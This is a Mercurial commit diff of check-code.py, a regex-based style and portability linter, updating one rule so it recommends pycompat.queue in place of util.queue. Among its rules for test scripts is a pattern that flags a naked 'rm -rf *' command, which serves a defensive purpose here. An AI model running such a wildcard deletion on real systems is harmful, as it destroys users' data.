pycompat: export queue module instead of symbols in module (API)...
Gregory Szorc
r37863:8fb99853 (branch: default)
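This commit stops re-exporting individual symbols (previously util.queue was the Queue class and util.empty the Empty exception) and instead exports the whole standard-library module as pycompat.queue, which aliases Python 2's Queue module and Python 3's queue module. A minimal before/after sketch of caller code, with names taken from the updated check-code rule in this diff:

    # before: individual symbols re-exported through util
    from mercurial import util
    q = util.queue()                  # util.queue was the Queue class
    try:
        item = q.get(timeout=0.1)
    except util.empty:                # util.empty was the Empty exception
        pass

    # after: one module-level export; use the stdlib names on it
    from mercurial import pycompat
    q = pycompat.queue.Queue()
    try:
        item = q.get(timeout=0.1)
    except pycompat.queue.Empty:
        pass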
--- a/contrib/check-code.py
+++ b/contrib/check-code.py
@@ -1,741 +1,742 @@
1 1 #!/usr/bin/env python
2 2 #
3 3 # check-code - a style and portability checker for Mercurial
4 4 #
5 5 # Copyright 2010 Matt Mackall <mpm@selenic.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """style and portability checker for Mercurial
11 11
12 12 when a rule triggers wrongly, do one of the following (prefer one from the top):
13 13 * apply the workaround the rule suggests
14 14 * double-check that it is a false match
15 15 * improve the rule pattern
16 16 * add an ignore pattern to the rule (3rd arg) which matches your good line
17 17 (you can append a short comment and match this, like: #re-raises)
18 18 * change the pattern to a warning and list the exception in test-check-code-hg
19 19 * ONLY use no--check-code for skipping entire files from external sources
20 20 """
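For example, the naked-except rule in pypats below carries such an ignore pattern as its third element, so a line that ends in a matching comment is not reported:

    # (pattern, message, ignore pattern) -- taken from pypats in this file
    (r'^\s*except\s*:', "naked except clause", r'#.*re-raises'),
    # a line like "except:  # re-raises" matches the rule but is skipped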
21 21
22 22 from __future__ import absolute_import, print_function
23 23 import glob
24 24 import keyword
25 25 import optparse
26 26 import os
27 27 import re
28 28 import sys
29 29 if sys.version_info[0] < 3:
30 30 opentext = open
31 31 else:
32 32 def opentext(f):
33 33 return open(f, encoding='ascii')
34 34 try:
35 35 xrange
36 36 except NameError:
37 37 xrange = range
38 38 try:
39 39 import re2
40 40 except ImportError:
41 41 re2 = None
42 42
43 43 def compilere(pat, multiline=False):
44 44 if multiline:
45 45 pat = '(?m)' + pat
46 46 if re2:
47 47 try:
48 48 return re2.compile(pat)
49 49 except re2.error:
50 50 pass
51 51 return re.compile(pat)
52 52
53 53 # check "rules depending on implementation of repquote()" in each
54 54 # patterns (especially pypats), before changing around repquote()
55 55 _repquotefixedmap = {' ': ' ', '\n': '\n', '.': 'p', ':': 'q',
56 56 '%': '%', '\\': 'b', '*': 'A', '+': 'P', '-': 'M'}
57 57 def _repquoteencodechr(i):
58 58 if i > 255:
59 59 return 'u'
60 60 c = chr(i)
61 61 if c in _repquotefixedmap:
62 62 return _repquotefixedmap[c]
63 63 if c.isalpha():
64 64 return 'x'
65 65 if c.isdigit():
66 66 return 'n'
67 67 return 'o'
68 68 _repquotett = ''.join(_repquoteencodechr(i) for i in xrange(256))
69 69
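As an illustration (not part of the patch) of the table above: repquote() keeps the surrounding quotes and translates the body, alphabetics to 'x', digits to 'n', and punctuation per the fixed map, so later rules can match the shape of string contents instead of the literal text:

    # hypothetical repquote() input -> output for a matched string literal
    'hg 2.1: %s\n'   ->   'xx npnq %x\n'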
70 70 def repquote(m):
71 71 t = m.group('text')
72 72 t = t.translate(_repquotett)
73 73 return m.group('quote') + t + m.group('quote')
74 74
75 75 def reppython(m):
76 76 comment = m.group('comment')
77 77 if comment:
78 78 l = len(comment.rstrip())
79 79 return "#" * l + comment[l:]
80 80 return repquote(m)
81 81
82 82 def repcomment(m):
83 83 return m.group(1) + "#" * len(m.group(2))
84 84
85 85 def repccomment(m):
86 86 t = re.sub(r"((?<=\n) )|\S", "x", m.group(2))
87 87 return m.group(1) + t + "*/"
88 88
89 89 def repcallspaces(m):
90 90 t = re.sub(r"\n\s+", "\n", m.group(2))
91 91 return m.group(1) + t
92 92
93 93 def repinclude(m):
94 94 return m.group(1) + "<foo>"
95 95
96 96 def rephere(m):
97 97 t = re.sub(r"\S", "x", m.group(2))
98 98 return m.group(1) + t
99 99
100 100
101 101 testpats = [
102 102 [
103 103 (r'\b(push|pop)d\b', "don't use 'pushd' or 'popd', use 'cd'"),
104 104 (r'\W\$?\(\([^\)\n]*\)\)', "don't use (()) or $(()), use 'expr'"),
105 105 (r'grep.*-q', "don't use 'grep -q', redirect to /dev/null"),
106 106 (r'(?<!hg )grep.* -a', "don't use 'grep -a', use in-line python"),
107 107 (r'sed.*-i', "don't use 'sed -i', use a temporary file"),
108 108 (r'\becho\b.*\\n', "don't use 'echo \\n', use printf"),
109 109 (r'echo -n', "don't use 'echo -n', use printf"),
110 110 (r'(^|\|\s*)\bwc\b[^|]*$\n(?!.*\(re\))', "filter wc output"),
111 111 (r'head -c', "don't use 'head -c', use 'dd'"),
112 112 (r'tail -n', "don't use the '-n' option to tail, just use '-<num>'"),
113 113 (r'sha1sum', "don't use sha1sum, use $TESTDIR/md5sum.py"),
114 114 (r'\bls\b.*-\w*R', "don't use 'ls -R', use 'find'"),
115 115 (r'printf.*[^\\]\\([1-9]|0\d)', r"don't use 'printf \NNN', use Python"),
116 116 (r'printf.*[^\\]\\x', "don't use printf \\x, use Python"),
117 117 (r'\$\(.*\)', "don't use $(expr), use `expr`"),
118 118 (r'rm -rf \*', "don't use naked rm -rf, target a directory"),
119 119 (r'\[[^\]]+==', '[ foo == bar ] is a bashism, use [ foo = bar ] instead'),
120 120 (r'(^|\|\s*)grep (-\w\s+)*[^|]*[(|]\w',
121 121 "use egrep for extended grep syntax"),
122 122 (r'(^|\|\s*)e?grep .*\\S', "don't use \\S in regular expression"),
123 123 (r'(?<!!)/bin/', "don't use explicit paths for tools"),
124 124 (r'#!.*/bash', "don't use bash in shebang, use sh"),
125 125 (r'[^\n]\Z', "no trailing newline"),
126 126 (r'export .*=', "don't export and assign at once"),
127 127 (r'^source\b', "don't use 'source', use '.'"),
128 128 (r'touch -d', "don't use 'touch -d', use 'touch -t' instead"),
129 129 (r'\bls +[^|\n-]+ +-', "options to 'ls' must come before filenames"),
130 130 (r'[^>\n]>\s*\$HGRCPATH', "don't overwrite $HGRCPATH, append to it"),
131 131 (r'^stop\(\)', "don't use 'stop' as a shell function name"),
132 132 (r'(\[|\btest\b).*-e ', "don't use 'test -e', use 'test -f'"),
133 133 (r'\[\[\s+[^\]]*\]\]', "don't use '[[ ]]', use '[ ]'"),
134 134 (r'^alias\b.*=', "don't use alias, use a function"),
135 135 (r'if\s*!', "don't use '!' to negate exit status"),
136 136 (r'/dev/u?random', "don't use entropy, use /dev/zero"),
137 137 (r'do\s*true;\s*done', "don't use true as loop body, use sleep 0"),
138 138 (r'sed (-e )?\'(\d+|/[^/]*/)i(?!\\\n)',
139 139 "put a backslash-escaped newline after sed 'i' command"),
140 140 (r'^diff *-\w*[uU].*$\n(^ \$ |^$)', "prefix diff -u/-U with cmp"),
141 141 (r'^\s+(if)? diff *-\w*[uU]', "prefix diff -u/-U with cmp"),
142 142 (r'[\s="`\']python\s(?!bindings)', "don't use 'python', use '$PYTHON'"),
143 143 (r'seq ', "don't use 'seq', use $TESTDIR/seq.py"),
144 144 (r'\butil\.Abort\b', "directly use error.Abort"),
145 145 (r'\|&', "don't use |&, use 2>&1"),
146 146 (r'\w = +\w', "only one space after = allowed"),
147 147 (r'\bsed\b.*[^\\]\\n', "don't use 'sed ... \\n', use a \\ and a newline"),
148 148 (r'env.*-u', "don't use 'env -u VAR', use 'unset VAR'"),
149 149 (r'cp.* -r ', "don't use 'cp -r', use 'cp -R'"),
150 150 (r'grep.* -[ABC]', "don't use grep's context flags"),
151 151 (r'find.*-printf',
152 152 "don't use 'find -printf', it doesn't exist on BSD find(1)"),
153 153 (r'\$RANDOM ', "don't use bash-only $RANDOM to generate random values"),
154 154 ],
155 155 # warnings
156 156 [
157 157 (r'^function', "don't use 'function', use old style"),
158 158 (r'^diff.*-\w*N', "don't use 'diff -N'"),
159 159 (r'\$PWD|\${PWD}', "don't use $PWD, use `pwd`"),
160 160 (r'^([^"\'\n]|("[^"\n]*")|(\'[^\'\n]*\'))*\^', "^ must be quoted"),
161 161 (r'kill (`|\$\()', "don't use kill, use killdaemons.py")
162 162 ]
163 163 ]
164 164
165 165 testfilters = [
166 166 (r"( *)(#([^!][^\n]*\S)?)", repcomment),
167 167 (r"<<(\S+)((.|\n)*?\n\1)", rephere),
168 168 ]
169 169
170 170 uprefix = r"^ \$ "
171 171 utestpats = [
172 172 [
173 173 (r'^(\S.*|| [$>] \S.*)[ \t]\n', "trailing whitespace on non-output"),
174 174 (uprefix + r'.*\|\s*sed[^|>\n]*\n',
175 175 "use regex test output patterns instead of sed"),
176 176 (uprefix + r'(true|exit 0)', "explicit zero exit unnecessary"),
177 177 (uprefix + r'.*(?<!\[)\$\?', "explicit exit code checks unnecessary"),
178 178 (uprefix + r'.*\|\| echo.*(fail|error)',
179 179 "explicit exit code checks unnecessary"),
180 180 (uprefix + r'set -e', "don't use set -e"),
181 181 (uprefix + r'(\s|fi\b|done\b)', "use > for continued lines"),
182 182 (uprefix + r'.*:\.\S*/', "x:.y in a path does not work on msys, rewrite "
183 183 "as x://.y, or see `hg log -k msys` for alternatives", r'-\S+:\.|' #-Rxxx
184 184 '# no-msys'), # in test-pull.t which is skipped on windows
185 185 (r'^ [^$>].*27\.0\.0\.1',
186 186 'use $LOCALIP not an explicit loopback address'),
187 187 (r'^ (?![>$] ).*\$LOCALIP.*[^)]$',
188 188 'mark $LOCALIP output lines with (glob) to help tests in BSD jails'),
189 189 (r'^ (cat|find): .*: \$ENOENT\$',
190 190 'use test -f to test for file existence'),
191 191 (r'^ diff -[^ -]*p',
192 192 "don't use (external) diff with -p for portability"),
193 193 (r' readlink ', 'use readlink.py instead of readlink'),
194 194 (r'^ [-+][-+][-+] .* [-+]0000 \(glob\)',
195 195 "glob timezone field in diff output for portability"),
196 196 (r'^ @@ -[0-9]+ [+][0-9]+,[0-9]+ @@',
197 197 "use '@@ -N* +N,n @@ (glob)' style chunk header for portability"),
198 198 (r'^ @@ -[0-9]+,[0-9]+ [+][0-9]+ @@',
199 199 "use '@@ -N,n +N* @@ (glob)' style chunk header for portability"),
200 200 (r'^ @@ -[0-9]+ [+][0-9]+ @@',
201 201 "use '@@ -N* +N* @@ (glob)' style chunk header for portability"),
202 202 (uprefix + r'hg( +-[^ ]+( +[^ ]+)?)* +extdiff'
203 203 r'( +(-[^ po-]+|--(?!program|option)[^ ]+|[^-][^ ]*))*$',
204 204 "use $RUNTESTDIR/pdiff via extdiff (or -o/-p for false-positives)"),
205 205 ],
206 206 # warnings
207 207 [
208 208 (r'^ (?!.*\$LOCALIP)[^*?/\n]* \(glob\)$',
209 209 "glob match with no glob string (?, *, /, and $LOCALIP)"),
210 210 ]
211 211 ]
212 212
213 213 # transform plain test rules to unified test's
214 214 for i in [0, 1]:
215 215 for tp in testpats[i]:
216 216 p = tp[0]
217 217 m = tp[1]
218 218 if p.startswith(r'^'):
219 219 p = r"^ [$>] (%s)" % p[1:]
220 220 else:
221 221 p = r"^ [$>] .*(%s)" % p
222 222 utestpats[i].append((p, m) + tp[2:])
223 223
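As a worked example of the transform above (illustrative, using two rules from testpats): an anchored pattern keeps its anchor inside the unified-test prompt prefix, while an unanchored one gains a wildcard:

    r'^alias\b.*='   ->   r'^ [$>] (alias\b.*=)'
    r'grep.*-q'      ->   r'^ [$>] .*(grep.*-q)'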
224 224 # don't transform the following rules:
225 225 # " > \t" and " \t" should be allowed in unified tests
226 226 testpats[0].append((r'^( *)\t', "don't use tabs to indent"))
227 227 utestpats[0].append((r'^( ?)\t', "don't use tabs to indent"))
228 228
229 229 utestfilters = [
230 230 (r"<<(\S+)((.|\n)*?\n > \1)", rephere),
231 231 (r"( +)(#([^!][^\n]*\S)?)", repcomment),
232 232 ]
233 233
234 234 pypats = [
235 235 [
236 236 (r'^\s*def\s*\w+\s*\(.*,\s*\(',
237 237 "tuple parameter unpacking not available in Python 3+"),
238 238 (r'lambda\s*\(.*,.*\)',
239 239 "tuple parameter unpacking not available in Python 3+"),
240 240 (r'(?<!def)\s+(cmp)\(', "cmp is not available in Python 3+"),
241 241 (r'(?<!\.)\breduce\s*\(.*', "reduce is not available in Python 3+"),
242 242 (r'\bdict\(.*=', 'dict() is different in Py2 and 3 and is slower than {}',
243 243 'dict-from-generator'),
244 244 (r'\.has_key\b', "dict.has_key is not available in Python 3+"),
245 245 (r'\s<>\s', '<> operator is not available in Python 3+, use !='),
246 246 (r'^\s*\t', "don't use tabs"),
247 247 (r'\S;\s*\n', "semicolon"),
248 248 (r'[^_]_\([ \t\n]*(?:"[^"]+"[ \t\n+]*)+%', "don't use % inside _()"),
249 249 (r"[^_]_\([ \t\n]*(?:'[^']+'[ \t\n+]*)+%", "don't use % inside _()"),
250 250 (r'(\w|\)),\w', "missing whitespace after ,"),
251 251 (r'(\w|\))[+/*\-<>]\w', "missing whitespace in expression"),
252 252 (r'^\s+(\w|\.)+=\w[^,()\n]*$', "missing whitespace in assignment"),
253 253 (r'\w\s=\s\s+\w', "gratuitous whitespace after ="),
254 254 ((
255 255 # a line ending with a colon, potentially with trailing comments
256 256 r':([ \t]*#[^\n]*)?\n'
257 257 # one that is not a pass and not only a comment
258 258 r'(?P<indent>[ \t]+)[^#][^\n]+\n'
259 259 # more lines at the same indent level
260 260 r'((?P=indent)[^\n]+\n)*'
261 261 # a pass at the same indent level, which is bogus
262 262 r'(?P=indent)pass[ \t\n#]'
263 263 ), 'omit superfluous pass'),
264 264 (r'.{81}', "line too long"),
265 265 (r'[^\n]\Z', "no trailing newline"),
266 266 (r'(\S[ \t]+|^[ \t]+)\n', "trailing whitespace"),
267 267 # (r'^\s+[^_ \n][^_. \n]+_[^_\n]+\s*=',
268 268 # "don't use underbars in identifiers"),
269 269 (r'^\s+(self\.)?[A-Za-z][a-z0-9]+[A-Z]\w* = ',
270 270 "don't use camelcase in identifiers", r'#.*camelcase-required'),
271 271 (r'^\s*(if|while|def|class|except|try)\s[^[\n]*:\s*[^\\n]#\s]+',
272 272 "linebreak after :"),
273 273 (r'class\s[^( \n]+:', "old-style class, use class foo(object)",
274 274 r'#.*old-style'),
275 275 (r'class\s[^( \n]+\(\):',
276 276 "class foo() creates old style object, use class foo(object)",
277 277 r'#.*old-style'),
278 278 (r'\b(%s)\(' % '|'.join(k for k in keyword.kwlist
279 279 if k not in ('print', 'exec')),
280 280 "Python keyword is not a function"),
281 281 (r',]', "unneeded trailing ',' in list"),
282 282 # (r'class\s[A-Z][^\(]*\((?!Exception)',
283 283 # "don't capitalize non-exception classes"),
284 284 # (r'in range\(', "use xrange"),
285 285 # (r'^\s*print\s+', "avoid using print in core and extensions"),
286 286 (r'[\x80-\xff]', "non-ASCII character literal"),
287 287 (r'("\')\.format\(', "str.format() has no bytes counterpart, use %"),
288 288 (r'^\s*(%s)\s\s' % '|'.join(keyword.kwlist),
289 289 "gratuitous whitespace after Python keyword"),
290 290 (r'([\(\[][ \t]\S)|(\S[ \t][\)\]])', "gratuitous whitespace in () or []"),
291 291 # (r'\s\s=', "gratuitous whitespace before ="),
292 292 (r'[^>< ](\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\S',
293 293 "missing whitespace around operator"),
294 294 (r'[^>< ](\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\s',
295 295 "missing whitespace around operator"),
296 296 (r'\s(\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\S',
297 297 "missing whitespace around operator"),
298 298 (r'[^^+=*/!<>&| %-](\s=|=\s)[^= ]',
299 299 "wrong whitespace around ="),
300 300 (r'\([^()]*( =[^=]|[^<>!=]= )',
301 301 "no whitespace around = for named parameters"),
302 302 (r'raise Exception', "don't raise generic exceptions"),
303 303 (r'raise [^,(]+, (\([^\)]+\)|[^,\(\)]+)$',
304 304 "don't use old-style two-argument raise, use Exception(message)"),
305 305 (r' is\s+(not\s+)?["\'0-9-]', "object comparison with literal"),
306 306 (r' [=!]=\s+(True|False|None)',
307 307 "comparison with singleton, use 'is' or 'is not' instead"),
308 308 (r'^\s*(while|if) [01]:',
309 309 "use True/False for constant Boolean expression"),
310 310 (r'^\s*if False(:| +and)', 'Remove code instead of using `if False`'),
311 311 (r'(?:(?<!def)\s+|\()hasattr\(',
312 312 'hasattr(foo, bar) is broken on py2, use util.safehasattr(foo, bar) '
313 313 'instead', r'#.*hasattr-py3-only'),
314 314 (r'opener\([^)]*\).read\(',
315 315 "use opener.read() instead"),
316 316 (r'opener\([^)]*\).write\(',
317 317 "use opener.write() instead"),
318 318 (r'[\s\(](open|file)\([^)]*\)\.read\(',
319 319 "use util.readfile() instead"),
320 320 (r'[\s\(](open|file)\([^)]*\)\.write\(',
321 321 "use util.writefile() instead"),
322 322 (r'^[\s\(]*(open(er)?|file)\([^)]*\)(?!\.close\(\))',
323 323 "always assign an opened file to a variable, and close it afterwards"),
324 324 (r'[\s\(](open|file)\([^)]*\)\.(?!close\(\))',
325 325 "always assign an opened file to a variable, and close it afterwards"),
326 326 (r'(?i)descend[e]nt', "the proper spelling is descendAnt"),
327 327 (r'\.debug\(\_', "don't mark debug messages for translation"),
328 328 (r'\.strip\(\)\.split\(\)', "no need to strip before splitting"),
329 329 (r'^\s*except\s*:', "naked except clause", r'#.*re-raises'),
330 330 (r'^\s*except\s([^\(,]+|\([^\)]+\))\s*,',
331 331 'legacy exception syntax; use "as" instead of ","'),
332 332 (r':\n( )*( ){1,3}[^ ]', "must indent 4 spaces"),
333 333 (r'release\(.*wlock, .*lock\)', "wrong lock release order"),
334 334 (r'\bdef\s+__bool__\b', "__bool__ should be __nonzero__ in Python 2"),
335 335 (r'os\.path\.join\(.*, *(""|\'\')\)',
336 336 "use pathutil.normasprefix(path) instead of os.path.join(path, '')"),
337 337 (r'\s0[0-7]+\b', 'legacy octal syntax; use "0o" prefix instead of "0"'),
338 338 # XXX only catch mutable arguments on the first line of the definition
339 339 (r'def.*[( ]\w+=\{\}', "don't use mutable default arguments"),
340 340 (r'\butil\.Abort\b', "directly use error.Abort"),
341 341 (r'^@(\w*\.)?cachefunc', "module-level @cachefunc is risky, please avoid"),
342 342 (r'^import atexit', "don't use atexit, use ui.atexit"),
343 (r'^import Queue', "don't use Queue, use util.queue + util.empty"),
343 (r'^import Queue', "don't use Queue, use pycompat.queue.Queue + "
344 "pycompat.queue.Empty"),
344 345 (r'^import cStringIO', "don't use cStringIO.StringIO, use util.stringio"),
345 346 (r'^import urllib', "don't use urllib, use util.urlreq/util.urlerr"),
346 347 (r'^import SocketServer', "don't use SocketServer, use util.socketserver"),
347 348 (r'^import urlparse', "don't use urlparse, use util.urlreq"),
348 349 (r'^import xmlrpclib', "don't use xmlrpclib, use util.xmlrpclib"),
349 350 (r'^import cPickle', "don't use cPickle, use util.pickle"),
350 351 (r'^import pickle', "don't use pickle, use util.pickle"),
351 352 (r'^import httplib', "don't use httplib, use util.httplib"),
352 353 (r'^import BaseHTTPServer', "use util.httpserver instead"),
353 354 (r'^(from|import) mercurial\.(cext|pure|cffi)',
354 355 "use mercurial.policy.importmod instead"),
355 356 (r'\.next\(\)', "don't use .next(), use next(...)"),
356 357 (r'([a-z]*).revision\(\1\.node\(',
357 358 "don't convert rev to node before passing to revision(nodeorrev)"),
358 359 (r'platform\.system\(\)', "don't use platform.system(), use pycompat"),
359 360
360 361 # rules depending on implementation of repquote()
361 362 (r' x+[xpqo%APM][\'"]\n\s+[\'"]x',
362 363 'string join across lines with no space'),
363 364 (r'''(?x)ui\.(status|progress|write|note|warn)\(
364 365 [ \t\n#]*
365 366 (?# any strings/comments might precede a string, which
366 367 # contains translatable message)
367 368 ((['"]|\'\'\'|""")[ \npq%bAPMxno]*(['"]|\'\'\'|""")[ \t\n#]+)*
368 369 (?# sequence consisting of below might precede translatable message
369 370 # - formatting string: "% 10s", "%05d", "% -3.2f", "%*s", "%%" ...
370 371 # - escaped character: "\\", "\n", "\0" ...
371 372 # - character other than '%', 'b' as '\', and 'x' as alphabet)
372 373 (['"]|\'\'\'|""")
373 374 ((%([ n]?[PM]?([np]+|A))?x)|%%|b[bnx]|[ \nnpqAPMo])*x
374 375 (?# this regexp can't use [^...] style,
375 376 # because _preparepats forcibly adds "\n" into [^...],
376 377 # even though this regexp wants match it against "\n")''',
377 378 "missing _() in ui message (use () to hide false-positives)"),
378 379 ],
379 380 # warnings
380 381 [
381 382 # rules depending on implementation of repquote()
382 383 (r'(^| )pp +xxxxqq[ \n][^\n]', "add two newlines after '.. note::'"),
383 384 ]
384 385 ]
385 386
386 387 pyfilters = [
387 388 (r"""(?msx)(?P<comment>\#.*?$)|
388 389 ((?P<quote>('''|\"\"\"|(?<!')'(?!')|(?<!")"(?!")))
389 390 (?P<text>(([^\\]|\\.)*?))
390 391 (?P=quote))""", reppython),
391 392 ]
392 393
393 394 # non-filter patterns
394 395 pynfpats = [
395 396 [
396 397 (r'pycompat\.osname\s*[=!]=\s*[\'"]nt[\'"]', "use pycompat.iswindows"),
397 398 (r'pycompat\.osname\s*[=!]=\s*[\'"]posix[\'"]', "use pycompat.isposix"),
398 399 (r'pycompat\.sysplatform\s*[!=]=\s*[\'"]darwin[\'"]',
399 400 "use pycompat.isdarwin"),
400 401 ],
401 402 # warnings
402 403 [],
403 404 ]
404 405
405 406 # extension non-filter patterns
406 407 pyextnfpats = [
407 408 [(r'^"""\n?[A-Z]', "don't capitalize docstring title")],
408 409 # warnings
409 410 [],
410 411 ]
411 412
412 413 txtfilters = []
413 414
414 415 txtpats = [
415 416 [
416 417 ('\s$', 'trailing whitespace'),
417 418 ('.. note::[ \n][^\n]', 'add two newlines after note::')
418 419 ],
419 420 []
420 421 ]
421 422
422 423 cpats = [
423 424 [
424 425 (r'//', "don't use //-style comments"),
425 426 (r'\S\t', "don't use tabs except for indent"),
426 427 (r'(\S[ \t]+|^[ \t]+)\n', "trailing whitespace"),
427 428 (r'.{81}', "line too long"),
428 429 (r'(while|if|do|for)\(', "use space after while/if/do/for"),
429 430 (r'return\(', "return is not a function"),
430 431 (r' ;', "no space before ;"),
431 432 (r'[^;] \)', "no space before )"),
432 433 (r'[)][{]', "space between ) and {"),
433 434 (r'\w+\* \w+', "use int *foo, not int* foo"),
434 435 (r'\W\([^\)]+\) \w+', "use (int)foo, not (int) foo"),
435 436 (r'\w+ (\+\+|--)', "use foo++, not foo ++"),
436 437 (r'\w,\w', "missing whitespace after ,"),
437 438 (r'^[^#]\w[+/*]\w', "missing whitespace in expression"),
438 439 (r'\w\s=\s\s+\w', "gratuitous whitespace after ="),
439 440 (r'^#\s+\w', "use #foo, not # foo"),
440 441 (r'[^\n]\Z', "no trailing newline"),
441 442 (r'^\s*#import\b', "use only #include in standard C code"),
442 443 (r'strcpy\(', "don't use strcpy, use strlcpy or memcpy"),
443 444 (r'strcat\(', "don't use strcat"),
444 445
445 446 # rules depending on implementation of repquote()
446 447 ],
447 448 # warnings
448 449 [
449 450 # rules depending on implementation of repquote()
450 451 ]
451 452 ]
452 453
453 454 cfilters = [
454 455 (r'(/\*)(((\*(?!/))|[^*])*)\*/', repccomment),
455 456 (r'''(?P<quote>(?<!")")(?P<text>([^"]|\\")+)"(?!")''', repquote),
456 457 (r'''(#\s*include\s+<)([^>]+)>''', repinclude),
457 458 (r'(\()([^)]+\))', repcallspaces),
458 459 ]
459 460
460 461 inutilpats = [
461 462 [
462 463 (r'\bui\.', "don't use ui in util"),
463 464 ],
464 465 # warnings
465 466 []
466 467 ]
467 468
468 469 inrevlogpats = [
469 470 [
470 471 (r'\brepo\.', "don't use repo in revlog"),
471 472 ],
472 473 # warnings
473 474 []
474 475 ]
475 476
476 477 webtemplatefilters = []
477 478
478 479 webtemplatepats = [
479 480 [],
480 481 [
481 482 (r'{desc(\|(?!websub|firstline)[^\|]*)+}',
482 483 'follow desc keyword with either firstline or websub'),
483 484 ]
484 485 ]
485 486
486 487 allfilesfilters = []
487 488
488 489 allfilespats = [
489 490 [
490 491 (r'(http|https)://[a-zA-Z0-9./]*selenic.com/',
491 492 'use mercurial-scm.org domain URL'),
492 493 (r'mercurial@selenic\.com',
493 494 'use mercurial-scm.org domain for mercurial ML address'),
494 495 (r'mercurial-devel@selenic\.com',
495 496 'use mercurial-scm.org domain for mercurial-devel ML address'),
496 497 ],
497 498 # warnings
498 499 [],
499 500 ]
500 501
501 502 py3pats = [
502 503 [
503 504 (r'os\.environ', "use encoding.environ instead (py3)", r'#.*re-exports'),
504 505 (r'os\.name', "use pycompat.osname instead (py3)"),
505 506 (r'os\.getcwd', "use pycompat.getcwd instead (py3)"),
506 507 (r'os\.sep', "use pycompat.ossep instead (py3)"),
507 508 (r'os\.pathsep', "use pycompat.ospathsep instead (py3)"),
508 509 (r'os\.altsep', "use pycompat.osaltsep instead (py3)"),
509 510 (r'sys\.platform', "use pycompat.sysplatform instead (py3)"),
510 511 (r'getopt\.getopt', "use pycompat.getoptb instead (py3)"),
511 512 (r'os\.getenv', "use encoding.environ.get instead"),
512 513 (r'os\.setenv', "modifying the environ dict is not preferred"),
513 514 ],
514 515 # warnings
515 516 [],
516 517 ]
517 518
518 519 checks = [
519 520 ('python', r'.*\.(py|cgi)$', r'^#!.*python', pyfilters, pypats),
520 521 ('python', r'.*\.(py|cgi)$', r'^#!.*python', [], pynfpats),
521 522 ('python', r'.*hgext.*\.py$', '', [], pyextnfpats),
522 523 ('python 3', r'.*(hgext|mercurial)/(?!demandimport|policy|pycompat).*\.py',
523 524 '', pyfilters, py3pats),
524 525 ('test script', r'(.*/)?test-[^.~]*$', '', testfilters, testpats),
525 526 ('c', r'.*\.[ch]$', '', cfilters, cpats),
526 527 ('unified test', r'.*\.t$', '', utestfilters, utestpats),
527 528 ('layering violation repo in revlog', r'mercurial/revlog\.py', '',
528 529 pyfilters, inrevlogpats),
529 530 ('layering violation ui in util', r'mercurial/util\.py', '', pyfilters,
530 531 inutilpats),
531 532 ('txt', r'.*\.txt$', '', txtfilters, txtpats),
532 533 ('web template', r'mercurial/templates/.*\.tmpl', '',
533 534 webtemplatefilters, webtemplatepats),
534 535 ('all except for .po', r'.*(?<!\.po)$', '',
535 536 allfilesfilters, allfilespats),
536 537 ]
537 538
538 539 def _preparepats():
539 540 for c in checks:
540 541 failandwarn = c[-1]
541 542 for pats in failandwarn:
542 543 for i, pseq in enumerate(pats):
543 544 # fix-up regexes for multi-line searches
544 545 p = pseq[0]
545 546 # \s doesn't match \n (done in two steps)
546 547 # first, we replace \s that appears in a set already
547 548 p = re.sub(r'\[\\s', r'[ \\t', p)
548 549 # now we replace other \s instances.
549 550 p = re.sub(r'(?<!(\\|\[))\\s', r'[ \\t]', p)
550 551 # [^...] doesn't match newline
551 552 p = re.sub(r'(?<!\\)\[\^', r'[^\\n', p)
552 553
553 554 pats[i] = (re.compile(p, re.MULTILINE),) + pseq[1:]
554 555 filters = c[3]
555 556 for i, flt in enumerate(filters):
556 557 filters[i] = re.compile(flt[0]), flt[1]
557 558
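For illustration (not part of the patch), the fix-ups rewrite two of the rules above as follows, so that \s and negated sets stop matching across lines in the multi-line search:

    r'\S;\s*\n'   ->   r'\S;[ \t]*\n'      # bare \s becomes [ \t]
    r'[^;] \)'    ->   r'[^\n;] \)'        # \n is forced into the negated set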
558 559 class norepeatlogger(object):
559 560 def __init__(self):
560 561 self._lastseen = None
561 562
562 563 def log(self, fname, lineno, line, msg, blame):
563 564 """print error related a to given line of a given file.
564 565
565 566 The faulty line will also be printed but only once in the case
566 567 of multiple errors.
567 568
568 569 :fname: filename
569 570 :lineno: line number
570 571 :line: actual content of the line
571 572 :msg: error message
572 573 """
573 574 msgid = fname, lineno, line
574 575 if msgid != self._lastseen:
575 576 if blame:
576 577 print("%s:%d (%s):" % (fname, lineno, blame))
577 578 else:
578 579 print("%s:%d:" % (fname, lineno))
579 580 print(" > %s" % line)
580 581 self._lastseen = msgid
581 582 print(" " + msg)
582 583
583 584 _defaultlogger = norepeatlogger()
584 585
585 586 def getblame(f):
586 587 lines = []
587 588 for l in os.popen('hg annotate -un %s' % f):
588 589 start, line = l.split(':', 1)
589 590 user, rev = start.split()
590 591 lines.append((line[1:-1], user, rev))
591 592 return lines
592 593
593 594 def checkfile(f, logfunc=_defaultlogger.log, maxerr=None, warnings=False,
594 595 blame=False, debug=False, lineno=True):
595 596 """checks style and portability of a given file
596 597
597 598 :f: filepath
598 599 :logfunc: function used to report errors
599 600 logfunc(filename, linenumber, linecontent, errormessage)
600 601 :maxerr: number of errors to display before aborting.
601 602 Set to false (default) to report all errors
602 603
603 604 return True if no error is found, False otherwise.
604 605 """
605 606 blamecache = None
606 607 result = True
607 608
608 609 try:
609 610 with opentext(f) as fp:
610 611 try:
611 612 pre = post = fp.read()
612 613 except UnicodeDecodeError as e:
613 614 print("%s while reading %s" % (e, f))
614 615 return result
615 616 except IOError as e:
616 617 print("Skipping %s, %s" % (f, str(e).split(':', 1)[0]))
617 618 return result
618 619
619 620 for name, match, magic, filters, pats in checks:
620 621 post = pre # discard filtering result of previous check
621 622 if debug:
622 623 print(name, f)
623 624 fc = 0
624 625 if not (re.match(match, f) or (magic and re.search(magic, pre))):
625 626 if debug:
626 627 print("Skipping %s for %s it doesn't match %s" % (
627 628 name, match, f))
628 629 continue
629 630 if "no-" "check-code" in pre:
630 631 # If you're looking at this line, it's because a file has:
631 632 # no- check- code
632 633 # but the reason to output skipping is to make life for
633 634 # tests easier. So, instead of writing it with a normal
634 635 # spelling, we write it with the expected spelling from
635 636 # tests/test-check-code.t
636 637 print("Skipping %s it has no-che?k-code (glob)" % f)
637 638 return "Skip" # skip checking this file
638 639 for p, r in filters:
